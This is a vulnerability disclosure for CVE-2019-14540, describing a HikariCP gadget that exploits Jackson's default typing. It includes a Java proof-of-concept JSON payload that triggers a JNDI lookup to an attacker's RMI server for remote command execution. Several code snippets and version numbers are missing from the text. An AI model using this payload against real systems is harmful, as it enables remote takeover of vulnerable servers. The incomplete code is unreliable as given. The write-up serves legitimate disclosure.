CVE-2019-14540: Another gadgets to exploit default typing issue in (Jackson 2.x - and 2.10.0.pr1)

I found a new remote command execution gadget in the package of Hikari. This gadget has been successfully tested on the newest version of Jackson (2.10.0.pr1).

The requirements are as follows.

  • Enable Default Typing
  • Jackson ver 2.x -
  • Classpath contains HikariCP


1.Import latest version of Jackson.

        <!-- -->

2.Import HikariCP

        <!-- -->

or you can import other packages that contain HikariCP. For example, A well-know task scheduling framework quartz.


Proof of concept

import com.fasterxml.jackson.databind.ObjectMapper;

 * @author 浅蓝
 * @email
 * @since 2019/7/31 14:15
public class HikariTest {

    public static void main(String[] args) throws IOException{
        String json = "[\"com.zaxxer.hikari.HikariConfig\",{\"metricRegistry\":\"rmi://\"}]";
        ObjectMapper objectMapper = new ObjectMapper();


Firstly, We should enable defaultTyping then triggering deserialize.



This demo will connect to the attacker's malicious remote RMI server.

This gadget work in the version of,, 2.9.9, 2.8.9.

Detail of this gadget

In the latest release verion of hikari(3.3.1), there is a method called setMetricRegistry in the class file com.zaxxer.hikari.HikariConfig.


getObjectOrPerformJndiLookup will handle this method(setMetricRegistry)


In the getObjectOrPerformJndiLookup method, a JNDI connection request passed as parameters via lookup method in the InitialContext object.

but in the older version of hikari. Method setMetricRegistry was contained in the parent class AbstractHikariConfig. We can still exploit this demo by same gadget.


Finally, thanks for the translation by my friend @lonelyrain.